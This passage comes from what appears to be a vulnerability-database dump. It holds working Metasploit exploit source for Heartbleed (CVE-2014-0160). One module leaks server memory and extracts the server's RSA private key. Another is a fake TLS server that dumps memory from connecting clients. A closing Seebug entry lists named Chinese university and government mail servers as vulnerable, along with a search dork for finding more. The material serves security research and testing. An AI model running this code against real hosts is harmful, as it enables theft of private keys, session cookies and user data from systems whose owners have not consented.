establish_connect\n connect\n\n unless tls_callback == 'None'\n vprint_status(\"Trying to start SSL via #{tls_callback}\")\n res = self.send(TLS_CALLBACKS[tls_callback])\n if res.nil?\n vprint_error(\"STARTTLS failed...\")\n return nil\n end\n end\n\n vprint_status(\"Sending Client Hello...\")\n sock.put(client_hello)\n\n server_resp = get_server_hello\n\n if server_resp.nil?\n vprint_error(\"Server Hello Not Found\")\n return nil\n end\n\n server_resp\n end\n\n # Generates a heartbeat request\n def heartbeat_request(length)\n payload = \"\\x01\" # Heartbeat Message Type: Request (1)\n payload << [length].pack('n') # Payload Length: 65535\n\n ssl_record(HEARTBEAT_RECORD_TYPE, payload)\n end\n\n # Generates, sends and receives a heartbeat message\n def bleed\n connect_result = establish_connect\n return if connect_result.nil?\n\n vprint_status(\"Sending Heartbeat...\")\n sock.put(heartbeat_request(heartbeat_length))\n hdr = get_data(SSL_RECORD_HEADER_SIZE)\n if hdr.nil? || hdr.empty?\n vprint_error(\"No Heartbeat response...\")\n disconnect\n return\n end\n\n unpacked = hdr.unpack('Cnn')\n type = unpacked[0]\n version = unpacked[1] # must match the type from client_hello\n len = unpacked[2]\n\n # try to get the TLS error\n if type == ALERT_RECORD_TYPE\n res = get_data(len)\n alert_unp = res.unpack('CC')\n alert_level = alert_unp[0]\n alert_desc = alert_unp[1]\n\n # http://tools.ietf.org/html/rfc5246#section-7.2\n case alert_desc\n when 0x46\n msg = 'Protocol error. Looks like the chosen protocol is not supported.'\n else\n msg = 'Unknown error'\n end\n vprint_error(\"#{msg}\")\n disconnect\n return\n end\n\n unless type == HEARTBEAT_RECORD_TYPE && version == TLS_VERSION[tls_version]\n vprint_error(\"Unexpected Heartbeat response header (#{to_hex_string(hdr)})\")\n disconnect\n return\n end\n\n heartbeat_data = get_data(heartbeat_length)\n vprint_status(\"Heartbeat response, #{heartbeat_data.length} bytes\")\n disconnect\n heartbeat_data\n end\n\n # Stores received data\n def loot_and_report(heartbeat_data)\n if heartbeat_data.to_s.empty?\n vprint_error(\"Looks like there isn't leaked information...\")\n return\n end\n\n print_good(\"Heartbeat response with leak, #{heartbeat_data.length} bytes\")\n report_vuln({\n :host => rhost,\n :port => rport,\n :name => self.name,\n :refs => self.references,\n :info => \"Module #{self.fullname} successfully leaked info\"\n })\n\n if action.name == 'DUMP' # Check mode, dump if requested.\n pattern = dumpfilter\n if pattern\n match_data = heartbeat_data.scan(pattern).join\n else\n match_data = heartbeat_data\n end\n path = store_loot(\n 'openssl.heartbleed.server',\n 'application/octet-stream',\n rhost,\n match_data,\n nil,\n 'OpenSSL Heartbleed server memory'\n )\n print_good(\"Heartbeat data stored in #{path}\")\n end\n\n # Convert non-printable characters to periods\n printable_data = heartbeat_data.gsub(/[^[:print:]]/, '.')\n\n # Keep this many duplicates as padding around the deduplication message\n duplicate_pad = (DEDUP_REPEATED_CHARS_THRESHOLD / 3).round\n\n # Remove duplicate characters\n abbreviated_data = printable_data.gsub(/(.)\\1{#{(DEDUP_REPEATED_CHARS_THRESHOLD - 1)},}/) do |s|\n s[0, duplicate_pad] +\n ' repeated ' + (s.length - (2 * duplicate_pad)).to_s + ' times ' +\n s[-duplicate_pad, duplicate_pad]\n end\n\n # Show abbreviated data\n vprint_status(\"Printable info leaked:\\n#{abbreviated_data}\")\n end\n\n #\n # Keydumping helper methods\n #\n\n # Tries to retreive the private key\n def get_keys\n connect_result = establish_connect\n disconnect\n return if connect_result.nil?\n\n print_status(\"Scanning for private keys\")\n count = 0\n\n print_status(\"Getting public key constants...\")\n n, e = get_ne\n\n if n.nil? || e.nil?\n print_error(\"Failed to get public key, aborting.\")\n end\n\n vprint_status(\"n: #{n}\")\n vprint_status(\"e: #{e}\")\n print_status(\"#{Time.now.getutc} - Starting.\")\n\n max_keytries.times {\n # Loop up to MAX_KEYTRIES times, looking for keys\n if count % status_every == 0\n print_status(\"#{Time.now.getutc} - Attempt #{count}...\")\n end\n\n bleedresult = bleed\n return unless bleedresult\n\n p, q = get_factors(bleedresult, n) # Try to find factors in mem\n\n unless p.nil? || q.nil?\n key = key_from_pqe(p, q, e)\n print_good(\"#{Time.now.getutc} - Got the private key\")\n\n print_status(key.export)\n path = store_loot(\n 'openssl.heartbleed.server',\n 'text/plain',\n rhost,\n key.export,\n nil,\n 'OpenSSL Heartbleed Private Key'\n )\n print_status(\"Private key stored in #{path}\")\n return\n end\n count += 1\n }\n print_error(\"Private key not found. You can try to increase MAX_KEYTRIES and/or HEARTBEAT_LENGTH.\")\n end\n\n # Returns the N and E params from the public server certificate\n def get_ne\n unless @cert\n print_error(\"No certificate found\")\n return\n end\n\n return @cert.public_key.params['n'], @cert.public_key.params['e']\n end\n\n # Tries to find pieces of the private key in the provided data\n def get_factors(data, n)\n # Walk through data looking for factors of n\n psize = n.num_bits / 8 / 2\n return if data.nil?\n\n (0..(data.length-psize)).each{ |x|\n # Try each offset of suitable length\n can = OpenSSL::BN.new(data[x,psize].reverse.bytes.inject {|a,b| (a << 8) + b }.to_s)\n if can > 1 && can % 2 != 0 && can.num_bytes == psize\n # Only try candidates that have a chance...\n q, rem = n / can\n if rem == 0 && can != n\n vprint_good(\"Found factor at offset #{x.to_s(16)}\")\n p = can\n return p, q\n end\n end\n }\n return nil, nil\n end\n\n # Generates the private key from the P, Q and E values\n def key_from_pqe(p, q, e)\n # Returns an RSA Private Key from Factors\n key = OpenSSL::PKey::RSA.new()\n key.set_factors(p, q)\n\n n = key.p * key.q\n phi = (key.p - 1) * (key.q - 1 )\n d = OpenSSL::BN.new(e).mod_inverse(phi)\n\n key.set_key(n, e, d)\n\n dmp1 = key.d % (key.p - 1)\n dmq1 = key.d % (key.q - 1)\n iqmp = key.q.mod_inverse(key.p)\n\n key.set_crt_params(dmp1, dmq1, iqmp)\n\n return key\n end\n\n #\n # SSL/TLS packet methods\n #\n\n # Creates and returns a new SSL record with the provided data\n def ssl_record(type, data)\n record = [type, TLS_VERSION[tls_version], data.length].pack('Cnn')\n record << data\n end\n\n # generates a CLIENT_HELLO ssl/tls packet\n def client_hello\n # Use current day for TLS time\n time_temp = Time.now\n time_epoch = Time.mktime(time_temp.year, time_temp.month, time_temp.day, 0, 0).to_i\n\n hello_data = [TLS_VERSION[tls_version]].pack('n') # Version TLS\n hello_data << [time_epoch].pack('N') # Time in epoch format\n hello_data << Rex::Text.rand_text(28) # Random\n hello_data << \"\\x00\" # Session ID length\n hello_data << [CIPHER_SUITES.length * 2].pack('n') # Cipher Suites length (102)\n hello_data << CIPHER_SUITES.pack('n*') # Cipher Suites\n hello_data << \"\\x01\" # Compression methods length (1)\n hello_data << \"\\x00\" # Compression methods: null\n\n hello_data_extensions = \"\\x00\\x0f\" # Extension type (Heartbeat)\n hello_data_extensions << \"\\x00\\x01\" # Extension length\n hello_data_extensions << \"\\x01\" # Extension data\n\n hello_data << [hello_data_extensions.length].pack('n')\n hello_data << hello_data_extensions\n\n data = \"\\x01\\x00\" # Handshake Type: Client Hello (1)\n data << [hello_data.length].pack('n') # Length\n data << hello_data\n\n ssl_record(HANDSHAKE_RECORD_TYPE, data)\n end\n\n def get_ssl_record\n hdr = get_data(SSL_RECORD_HEADER_SIZE)\n\n unless hdr\n vprint_error(\"No SSL record header received after #{response_timeout} seconds...\")\n return nil\n end\n\n len = hdr.unpack('Cnn')[2]\n data = get_data(len) unless len.nil?\n\n unless data\n vprint_error(\"No SSL record contents received after #{response_timeout} seconds...\")\n return nil\n end\n\n hdr << data\n end\n\n # Get and parse server hello response until we hit Server Hello Done or timeout\n def get_server_hello\n server_done = nil\n ssl_record_counter = 0\n\n remaining_data = get_ssl_record\n\n while remaining_data && remaining_data.length > 0\n ssl_record_counter += 1\n ssl_unpacked = remaining_data.unpack('CH4n')\n return nil if ssl_unpacked.nil? or ssl_unpacked.length < 3\n ssl_type = ssl_unpacked[0]\n ssl_version = ssl_unpacked[1]\n ssl_len = ssl_unpacked[2]\n vprint_status(\"SSL record ##{ssl_record_counter}:\")\n vprint_status(\"\\tType: #{ssl_type}\")\n vprint_status(\"\\tVersion: 0x#{ssl_version}\")\n vprint_status(\"\\tLength: #{ssl_len}\")\n if ssl_type != HANDSHAKE_RECORD_TYPE\n vprint_status(\"\\tWrong Record Type! (#{ssl_type})\")\n else\n ssl_data = remaining_data[5, ssl_len]\n handshakes = parse_handshakes(ssl_data)\n\n # Stop once we receive a SERVER_HELLO_DONE\n if handshakes && handshakes.length > 0 && handshakes[-1][:type] == HANDSHAKE_SERVER_HELLO_DONE_TYPE\n server_done = true\n break\n end\n\n end\n\n remaining_data = get_ssl_record\n end\n\n server_done\n end\n\n # Parse Handshake data returned from servers\n def parse_handshakes(data)\n # Can contain multiple handshakes\n remaining_data = data\n handshakes = []\n handshake_count = 0\n while remaining_data && remaining_data.length > 0\n hs_unpacked = remaining_data.unpack('CCn')\n next if hs_unpacked.nil? or hs_unpacked.length < 3\n hs_type = hs_unpacked[0]\n hs_len_pad = hs_unpacked[1]\n hs_len = hs_unpacked[2]\n hs_data = remaining_data[4, hs_len]\n handshake_count += 1\n vprint_status(\"\\tHandshake ##{handshake_count}:\")\n vprint_status(\"\\t\\tLength: #{hs_len}\")\n\n handshake_parsed = nil\n case hs_type\n when HANDSHAKE_SERVER_HELLO_TYPE\n vprint_status(\"\\t\\tType: Server Hello (#{hs_type})\")\n handshake_parsed = parse_server_hello(hs_data)\n when HANDSHAKE_CERTIFICATE_TYPE\n vprint_status(\"\\t\\tType: Certificate Data (#{hs_type})\")\n handshake_parsed = parse_certificate_data(hs_data)\n when HANDSHAKE_KEY_EXCHANGE_TYPE\n vprint_status(\"\\t\\tType: Server Key Exchange (#{hs_type})\")\n # handshake_parsed = parse_server_key_exchange(hs_data)\n when HANDSHAKE_SERVER_HELLO_DONE_TYPE\n vprint_status(\"\\t\\tType: Server Hello Done (#{hs_type})\")\n else\n vprint_status(\"\\t\\tType: Handshake type #{hs_type} not implemented\")\n end\n\n handshakes << {\n :type => hs_type,\n :len => hs_len,\n :data => handshake_parsed\n }\n remaining_data = remaining_data[(hs_len + 4)..-1]\n end\n\n handshakes\n end\n\n # Parse Server Hello message\n def parse_server_hello(data)\n version = data.unpack('H4')[0]\n vprint_status(\"\\t\\tServer Hello Version: 0x#{version}\")\n random = data[2,32].unpack('H*')[0]\n vprint_status(\"\\t\\tServer Hello random data: #{random}\")\n session_id_length = data[34,1].unpack('C')[0]\n vprint_status(\"\\t\\tServer Hello Session ID length: #{session_id_length}\")\n session_id = data[35,session_id_length].unpack('H*')[0]\n vprint_status(\"\\t\\tServer Hello Session ID: #{session_id}\")\n # TODO Read the rest of the server hello (respect message length)\n\n # TODO: return hash with data\n true\n end\n\n # Parse certificate data\n def parse_certificate_data(data)\n # get certificate data length\n unpacked = data.unpack('Cn')\n cert_len_padding = unpacked[0]\n cert_len = unpacked[1]\n vprint_status(\"\\t\\tCertificates length: #{cert_len}\")\n vprint_status(\"\\t\\tData length: #{data.length}\")\n # contains multiple certs\n already_read = 3\n cert_counter = 0\n while already_read < cert_len\n cert_counter += 1\n # get single certificate length\n single_cert_unpacked = data[already_read, 3].unpack('Cn')\n single_cert_len_padding = single_cert_unpacked[0]\n single_cert_len = single_cert_unpacked[1]\n vprint_status(\"\\t\\tCertificate ##{cert_counter}:\")\n vprint_status(\"\\t\\t\\tCertificate ##{cert_counter}: Length: #{single_cert_len}\")\n certificate_data = data[(already_read + 3), single_cert_len]\n cert = OpenSSL::X509::Certificate.new(certificate_data)\n # First received certificate is the one from the server\n @cert = cert if @cert.nil?\n #vprint_status(\"Got certificate: #{cert.to_text}\")\n vprint_status(\"\\t\\t\\tCertificate ##{cert_counter}: #{cert.inspect}\")\n already_read = already_read + single_cert_len + 3\n end\n\n # TODO: return hash with data\n true\n end\nend\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/scanner/ssl/openssl_heartbleed.rb"}, {"lastseen": "2019-11-25T12:50:38", "bulletinFamily": "exploit", "description": "This module provides a fake SSL service that is intended to leak memory from client systems as they connect. This module is hardcoded for using the AES-128-CBC-SHA1 cipher.\n", "modified": "2018-08-27T18:11:22", "published": "2014-04-09T14:38:11", "id": "MSF:AUXILIARY/SERVER/OPENSSL_HEARTBEAT_CLIENT_MEMORY", "href": "", "type": "metasploit", "title": "OpenSSL Heartbeat (Heartbleed) Client Memory Exposure", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::TcpServer\n include Msf::Auxiliary::Report\n\n def initialize\n super(\n 'Name' => 'OpenSSL Heartbeat (Heartbleed) Client Memory Exposure',\n 'Description' => %q{\n This module provides a fake SSL service that is intended to\n leak memory from client systems as they connect. This module is\n hardcoded for using the AES-128-CBC-SHA1 cipher.\n },\n 'Author' =>\n [\n 'Neel Mehta', # Vulnerability discovery\n 'Riku', # Vulnerability discovery\n 'Antti', # Vulnerability discovery\n 'Matti', # Vulnerability discovery\n 'hdm' # Metasploit module\n ],\n 'License' => MSF_LICENSE,\n 'Actions' => [['Capture']],\n 'PassiveActions' => ['Capture'],\n 'DefaultAction' => 'Capture',\n 'References' =>\n [\n [ 'CVE', '2014-0160' ],\n [ 'US-CERT-VU', '720951' ],\n [ 'URL', 'https://www.us-cert.gov/ncas/alerts/TA14-098A' ],\n [ 'URL', 'http://heartbleed.com/' ]\n ],\n 'DisclosureDate' => 'Apr 07 2014',\n 'Notes' =>\n {\n 'AKA' => ['Heartbleed']\n }\n\n )\n\n register_options(\n [\n OptPort.new('SRVPORT', [ true, \"The local port to listen on.\", 8443 ]),\n OptInt.new('HEARTBEAT_LIMIT', [true, \"The number of kilobytes of data to capture at most from each client\", 512]),\n OptInt.new('HEARTBEAT_READ', [true, \"The number of bytes to leak in the heartbeat response\", 65535]),\n OptBool.new('NEGOTIATE_TLS', [true, \"Set this to true to negotiate TLS and often leak more data at the cost of CA validation\", false])\n ])\n end\n\n # Initialize the client state and RSA key for this session\n def setup\n super\n @state = {}\n @cert_key = OpenSSL::PKey::RSA.new(1024){ } if negotiate_tls?\n end\n\n # Setup the server module and start handling requests\n def run\n print_status(\"Listening on #{datastore['SRVHOST']}:#{datastore['SRVPORT']}...\")\n exploit\n end\n\n # Determine how much memory to leak with each request\n def heartbeat_read_size\n datastore['HEARTBEAT_READ'].to_i\n end\n\n # Determine how much heartbeat data to capture at the most\n def heartbeat_limit\n datastore['HEARTBEAT_LIMIT'].to_i * 1024\n end\n\n # Determine whether we should negotiate TLS or not\n def negotiate_tls?\n !! datastore['NEGOTIATE_TLS']\n end\n\n # Initialize a new state for every client\n def on_client_connect(c)\n @state[c] = {\n :name => \"#{c.peerhost}:#{c.peerport}\",\n :ip => c.peerhost,\n :port => c.peerport,\n :heartbeats => \"\",\n :server_random => [Time.now.to_i].pack(\"N\") + Rex::Text.rand_text(28)\n }\n print_status(\"#{@state[c][:name]} Connected\")\n end\n\n # Buffer messages and parse them once they are fully received\n def on_client_data(c)\n data = c.get_once\n return if not data\n @state[c][:buff] ||= \"\"\n @state[c][:buff] << data\n process_request(c)\n end\n\n # Extract TLS messages from the buffer and process them\n def process_request(c)\n\n # Make this slightly harder to DoS\n if @state[c][:buff].to_s.length > (1024*128)\n print_status(\"#{@state[c][:name]} Buffer limit reached, dropping connection\")\n c.close\n return\n end\n\n # Process any buffered messages\n loop do\n break unless @state[c][:buff]\n\n message_type, message_ver, message_len = @state[c][:buff].unpack(\"Cnn\")\n break unless message_len\n break unless @state[c][:buff].length >= message_len+5\n\n mesg = @state[c][:buff].slice!(0, message_len+5)\n\n if @state[c][:encrypted]\n process_openssl_encrypted_request(c, mesg)\n else\n process_openssl_cleartext_request(c, mesg)\n end\n end\n end\n\n # Process cleartext TLS messages\n def process_openssl_cleartext_request(c, data)\n message_type, message_version, protocol_version = data.unpack(\"Cn@9n\")\n\n if message_type == 0x15 and data.length >= 7\n message_level, message_reason = data[5,2].unpack(\"CC\")\n print_status(\"#{@state[c][:name]} Alert Level #{message_level} Reason #{message_reason}\")\n if message_level == 2 and message_reason == 0x30\n print_status(\"#{@state[c][:name]} Client rejected our certificate due to unknown CA\")\n return\n end\n\n if level == 2\n print_status(\"#{@state[c][:name]} Client rejected our connection with a fatal error: #{message_reason}\")\n return\n end\n\n end\n\n unless message_type == 0x18\n message_code = data[5,1].to_s.unpack(\"C\").first\n vprint_status(\"#{@state[c][:name]} Message #{sprintf(\"type %.2x v%.4x %.2x\", message_type, message_version, message_code)}\")\n end\n\n # Process the Client Hello\n unless @state[c][:received_hello]\n\n unless (message_type == 0x16 and data.length > 43 and message_code == 0x01)\n print_status(\"#{@state[c][:name]} Expected a Client Hello, received #{sprintf(\"type %.2x code %.2x\", message_type, message_code)}\")\n return\n end\n\n print_status(\"#{@state[c][:name]} Processing Client Hello...\")\n\n # Extract the client_random needed to compute the master key\n @state[c][:client_random] = data[11,32]\n @state[c][:received_hello] = true\n\n print_status(\"#{@state[c][:name]} Sending Server Hello...\")\n openssl_send_server_hello(c, data, protocol_version)\n return\n end\n\n # If we are negotiating TLS, handle Client Key Exchange/Change Cipher Spec\n if negotiate_tls?\n # Process the Client Key Exchange\n if message_type == 0x16 and data.length > 11 and message_code == 0x10\n print_status(\"#{@state[c][:name]} Processing Client Key Exchange...\")\n premaster_length = data[9, 2].unpack(\"n\").first\n\n # Extract the pre-master secret in encrypted form\n if data.length >= 11 + premaster_length\n premaster_encrypted = data[11, premaster_length]\n\n # Decrypt the pre-master secret using our RSA key\n premaster_clear = @cert_key.private_decrypt(premaster_encrypted) rescue nil\n @state[c][:premaster] = premaster_clear if premaster_clear\n end\n end\n\n # Process the Change Cipher Spec and switch to encrypted communications\n if message_type == 0x14 and message_code == 0x01\n print_status(\"#{@state[c][:name]} Processing Change Cipher Spec...\")\n initialize_encryption_keys(c)\n return\n end\n # Otherwise just start capturing heartbeats in clear-text mode\n else\n # Send heartbeat requests\n if @state[c][:heartbeats].length < heartbeat_limit\n openssl_send_heartbeat(c, protocol_version)\n end\n\n # Process cleartext heartbeat replies\n if message_type == 0x18\n vprint_status(\"#{@state[c][:name]} Heartbeat received (#{data.length-5} bytes) [#{@state[c][:heartbeats].length} bytes total]\")\n @state[c][:heartbeats] << data[5, data.length-5]\n end\n\n # Full up on heartbeats, disconnect the client\n if @state[c][:heartbeats].length >= heartbeat_limit\n print_status(\"#{@state[c][:name]} Heartbeats received [#{@state[c][:heartbeats].length} bytes total]\")\n store_captured_heartbeats(c)\n c.close()\n end\n end\n end\n\n # Process encrypted TLS messages\n def process_openssl_encrypted_request(c, data)\n message_type, message_version, protocol_version = data.unpack(\"Cn@9n\")\n\n return if @state[c][:shutdown]\n return unless data.length > 5\n\n buff = decrypt_data(c, data[5, data.length-5])\n unless buff\n print_error(\"#{@state[c][:name]} Failed to decrypt, giving up on this client\")\n c.close\n return\n end\n\n message_code = buff[0,1].to_s.unpack(\"C\").first\n vprint_status(\"#{@state[c][:name]} Message #{sprintf(\"type %.2x v%.4x %.2x\", message_type, message_version, message_code)}\")\n\n if message_type == 0x16\n print_status(\"#{@state[c][:name]} Processing Client Finished...\")\n end\n\n # Send heartbeat requests\n if @state[c][:heartbeats].length < heartbeat_limit\n openssl_send_heartbeat(c, protocol_version)\n end\n\n # Process heartbeat replies\n if message_type == 0x18\n vprint_status(\"#{@state[c][:name]} Encrypted heartbeat received (#{buff.length} bytes) [#{@state[c][:heartbeats].length} bytes total]\")\n @state[c][:heartbeats] << buff\n end\n\n # Full up on heartbeats, disconnect the client\n if @state[c][:heartbeats].length >= heartbeat_limit\n print_status(\"#{@state[c][:name]} Encrypted heartbeats received [#{@state[c][:heartbeats].length} bytes total]\")\n store_captured_heartbeats(c)\n c.close()\n end\n end\n\n # Dump captured memory to a file on disk using the loot API\n def store_captured_heartbeats(c)\n if @state[c][:heartbeats].length > 0\n begin\n path = store_loot(\n \"openssl.heartbleed.client\",\n \"application/octet-stream\",\n @state[c][:ip],\n @state[c][:heartbeats],\n nil,\n \"OpenSSL Heartbleed client memory\"\n )\n print_good(\"#{@state[c][:name]} Heartbeat data stored in #{path}\")\n rescue ::Interrupt\n raise $!\n rescue ::Exception\n print_error(\"#{@state[c][:name]} Heartbeat data could not be stored: #{$!.class} #{$!}\")\n end\n\n # Report the memory disclosure as a vulnerability on the host\n report_vuln({\n :host => @state[c][:ip],\n :name => self.name,\n :info => \"Module #{self.fullname} successfully dumped client memory contents\",\n :refs => self.references,\n :exploited_at => Time.now.utc\n }) rescue nil # Squash errors related to ip => 127.0.0.1 and the like\n end\n\n # Clear the heartbeat array\n @state[c][:heartbeats] = \"\"\n @state[c][:shutdown] = true\n end\n\n # Delete the state on connection close\n def on_client_close(c)\n # Do we have any pending heartbeats to save?\n if @state[c][:heartbeats].length > 0\n store_captured_heartbeats(c)\n end\n @state.delete(c)\n end\n\n # Send an OpenSSL Server Hello response\n def openssl_send_server_hello(c, hello, version)\n\n # If encrypted, use the TLS_RSA_WITH_AES_128_CBC_SHA; otherwise, use the\n # first cipher suite sent by the client.\n if @state[c][:encrypted]\n cipher = \"\\x00\\x2F\"\n else\n cipher = hello[46, 2]\n end\n\n # Create the Server Hello response\n extensions =\n \"\\x00\\x0f\\x00\\x01\\x01\" # Heartbeat\n\n server_hello_payload =\n [version].pack('n') + # Use the protocol version sent by the client.\n @state[c][:server_random] + # Random (Timestamp + Random Bytes)\n \"\\x00\" + # Session ID\n cipher + # Cipher ID (TLS_RSA_WITH_AES_128_CBC_SHA)\n \"\\x00\" + # Compression Method (none)\n [extensions.length].pack('n') + extensions\n\n server_hello = [0x02].pack(\"C\") + [ server_hello_payload.length ].pack(\"N\")[1,3] + server_hello_payload\n\n msg1 = \"\\x16\" + [version].pack('n') + [server_hello.length].pack(\"n\") + server_hello\n c.put(msg1)\n\n # Skip the rest of TLS if we arent negotiating it\n unless negotiate_tls?\n # Send a heartbeat request to start the stream and return\n openssl_send_heartbeat(c, version)\n return\n end\n\n # Certificates\n certs_combined = generate_certificates\n pay2 = \"\\x0b\" + [ certs_combined.length + 3 ].pack(\"N\")[1, 3] + [ certs_combined.length ].pack(\"N\")[1, 3] + certs_combined\n msg2 = \"\\x16\" + [version].pack('n') + [pay2.length].pack(\"n\") + pay2\n c.put(msg2)\n\n # End of Server Hello\n pay3 = \"\\x0e\\x00\\x00\\x00\"\n msg3 = \"\\x16\" + [version].pack('n') + [pay3.length].pack(\"n\") + pay3\n c.put(msg3)\n end\n\n # Send the heartbeat request that results in memory exposure\n def openssl_send_heartbeat(c, version)\n c.put \"\\x18\" + [version].pack('n') + \"\\x00\\x03\\x01\" + [heartbeat_read_size].pack(\"n\")\n end\n\n # Pack the certificates for use in the TLS reply\n def generate_certificates\n certs = []\n certs << generate_certificate.to_der\n certs_combined = certs.map { |cert| [ cert.length ].pack(\"N\")[1, 3] + cert }.join\n end\n\n # Generate a self-signed certificate to use for the service\n def generate_certificate\n key = @cert_key\n cert = OpenSSL::X509::Certificate.new\n cert.version = 2\n cert.serial = rand(0xFFFFFFFF)\n\n subject_cn = Rex::Text.rand_hostname\n subject = OpenSSL::X509::Name.new([\n [\"C\",\"US\"],\n ['ST', Rex::Text.rand_state()],\n [\"L\", Rex::Text.rand_text_alpha(rand(20) + 10).capitalize],\n [\"O\", Rex::Text.rand_text_alpha(rand(20) + 10).capitalize],\n [\"CN\", subject_cn],\n ])\n issuer = OpenSSL::X509::Name.new([\n [\"C\",\"US\"],\n ['ST', Rex::Text.rand_state()],\n [\"L\", Rex::Text.rand_text_alpha(rand(20) + 10).capitalize],\n [\"O\", Rex::Text.rand_text_alpha(rand(20) + 10).capitalize],\n [\"CN\", Rex::Text.rand_text_alpha(rand(20) + 10).capitalize],\n ])\n\n cert.subject = subject\n cert.issuer = issuer\n cert.not_before = Time.now - (3600 * 24 * 365) + rand(3600 * 14)\n cert.not_after = Time.now + (3600 * 24 * 365) + rand(3600 * 14)\n cert.public_key = key.public_key\n ef = OpenSSL::X509::ExtensionFactory.new(nil,cert)\n cert.extensions = [\n ef.create_extension(\"basicConstraints\",\"CA:FALSE\"),\n ef.create_extension(\"subjectKeyIdentifier\",\"hash\"),\n ef.create_extension(\"extendedKeyUsage\",\"serverAuth\"),\n ef.create_extension(\"keyUsage\",\"keyEncipherment,dataEncipherment,digitalSignature\")\n ]\n ef.issuer_certificate = cert\n cert.add_extension ef.create_extension(\"authorityKeyIdentifier\", \"keyid:always,issuer:always\")\n cert.sign(key, OpenSSL::Digest::SHA1.new)\n cert\n end\n\n # Decrypt the TLS message and return the result without the MAC\n def decrypt_data(c, data)\n return unless @state[c][:client_enc]\n\n cipher = @state[c][:client_enc]\n\n begin\n buff = cipher.update(data)\n buff << cipher.final\n\n # Trim the trailing MAC signature off the buffer\n if buff.length >= 20\n return buff[0, buff.length-20]\n end\n rescue ::OpenSSL::Cipher::CipherError => e\n print_error(\"#{@state[c][:name]} Decryption failed: #{e}\")\n end\n\n nil\n end\n\n # Calculate keys and toggle encrypted status\n def initialize_encryption_keys(c)\n tls1_calculate_crypto_keys(c)\n @state[c][:encrypted] = true\n end\n\n # Determine crypto keys for AES-128-CBC based on the master secret\n def tls1_calculate_crypto_keys(c)\n @state[c][:master] = tls1_calculate_master_key(c)\n return unless @state[c][:master]\n\n key_block = tls1_prf(\n @state[c][:master],\n \"key expansion\" + @state[c][:server_random] + @state[c][:client_random],\n (20 * 2) + (16 * 4)\n )\n\n # Extract the MAC, encryption, and IV from the keyblock\n @state[c].update({\n :client_write_mac_key => key_block.slice!(0, 20),\n :server_write_mac_key => key_block.slice!(0, 20),\n :client_write_key => key_block.slice!(0, 16),\n :server_write_key => key_block.slice!(0, 16),\n :client_iv => key_block.slice!(0, 16),\n :server_iv => key_block.slice!(0, 16),\n })\n\n client_cipher = OpenSSL::Cipher.new('aes-128-cbc')\n client_cipher.key = @state[c][:client_write_key]\n client_cipher.iv = @state[c][:client_iv]\n client_cipher.decrypt\n client_mac = OpenSSL::HMAC.new(@state[c][:client_write_mac_key], OpenSSL::Digest.new('sha1'))\n\n server_cipher = OpenSSL::Cipher.new('aes-128-cbc')\n server_cipher.key = @state[c][:server_write_key]\n server_cipher.iv = @state[c][:server_iv]\n server_cipher.encrypt\n server_mac = OpenSSL::HMAC.new(@state[c][:server_write_mac_key], OpenSSL::Digest.new('sha1'))\n\n @state[c].update({\n :client_enc => client_cipher,\n :client_mac => client_mac,\n :server_enc => server_cipher,\n :server_mac => server_mac\n })\n\n true\n end\n\n # Determine the master key from the premaster and client/server randoms\n def tls1_calculate_master_key(c)\n return unless (\n @state[c][:premaster] and\n @state[c][:client_random] and\n @state[c][:server_random]\n )\n tls1_prf(\n @state[c][:premaster],\n \"master secret\" + @state[c][:client_random] + @state[c][:server_random],\n 48\n )\n end\n\n # Random generator used to calculate key data for TLS 1.0/1.1\n def tls1_prf(input_secret, input_label, output_length)\n # Calculate S1 and S2 as even blocks of each half of the secret\n # string. If the blocks are uneven, then S1's last byte should\n # be duplicated by S2's first byte\n blen = (input_secret.length / 2.0).ceil\n s1 = input_secret[0, blen]\n s2_index = blen\n if input_secret.length % 2 != 0\n s2_index -= 1\n end\n s2 = input_secret[s2_index, blen]\n\n # Hash the first part with MD5\n out1 = tls1_p_hash('md5', s1, input_label, output_length).unpack(\"C*\")\n\n # Hash the second part with SHA1\n out2 = tls1_p_hash('sha1', s2, input_label, output_length).unpack(\"C*\")\n\n # XOR the results together\n [*(0..out1.length-1)].map {|i| out1[i] ^ out2[i] }.pack(\"C*\")\n end\n\n # Used by tls1_prf to generate arbitrary amounts of session key data\n def tls1_p_hash(digest, secret, label, olen)\n output = \"\"\n chunk = OpenSSL::Digest.new(digest).digest_length\n ctx = OpenSSL::HMAC.new(secret, OpenSSL::Digest.new(digest))\n ctx_tmp = OpenSSL::HMAC.new(secret, OpenSSL::Digest.new(digest))\n\n ctx.update(label)\n a1 = ctx.digest\n\n loop do\n ctx = OpenSSL::HMAC.new(secret, OpenSSL::Digest.new(digest))\n ctx_tmp = OpenSSL::HMAC.new(secret, OpenSSL::Digest.new(digest))\n ctx.update(a1)\n ctx_tmp.update(a1)\n ctx.update(label)\n\n if olen > chunk\n output << ctx.digest\n a1 = ctx_tmp.digest\n olen -= chunk\n else\n a1 = ctx.digest\n output << a1[0, olen]\n break\n end\n end\n\n output\n end\nend\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/server/openssl_heartbeat_client_memory.rb"}], "seebug": [{"lastseen": "2017-11-19T17:27:32", "bulletinFamily": "exploit", "description": "### \u7b80\u8981\u63cf\u8ff0\uff1a\n\n\u6253\u5305\u4e86\u4e00\u5806\u7f51\u7ad9,\u5185\u5b58\u91cc\u6709cookies :D\n\n### \u8be6\u7ec6\u8bf4\u660e\uff1a\n\neYouMail 5 inurl:edu\n\u641c\u7d20\u51fa\u6765\u5c31\u80fd\u6709\u6f0f\u6d1e\u7684\u673a\u738790%\u5de6\u53f3\n\u524d\u4e09\u9875\u6210\u529f\u7684\u7ed3\u679c\n\n\n```\nmail.jn.gov.cn\nmail.hpu.edu.cn\nmail.just.edu.cn\nmail.hnust.edu.cn\nmail.tjut.edu.cn\nmail.shupl.edu.cn\nmail.haust.edu.cn\nmail.dufe.edu.cn\nmail.jliae.edu.cn\nmail.hist.edu.cn\ndn1s.cmc.edu.cn\nmail.hbpu.edu.cn\nmail.dzu.edu.cn\n```\n\n\nPOC\u9001\u4e0a 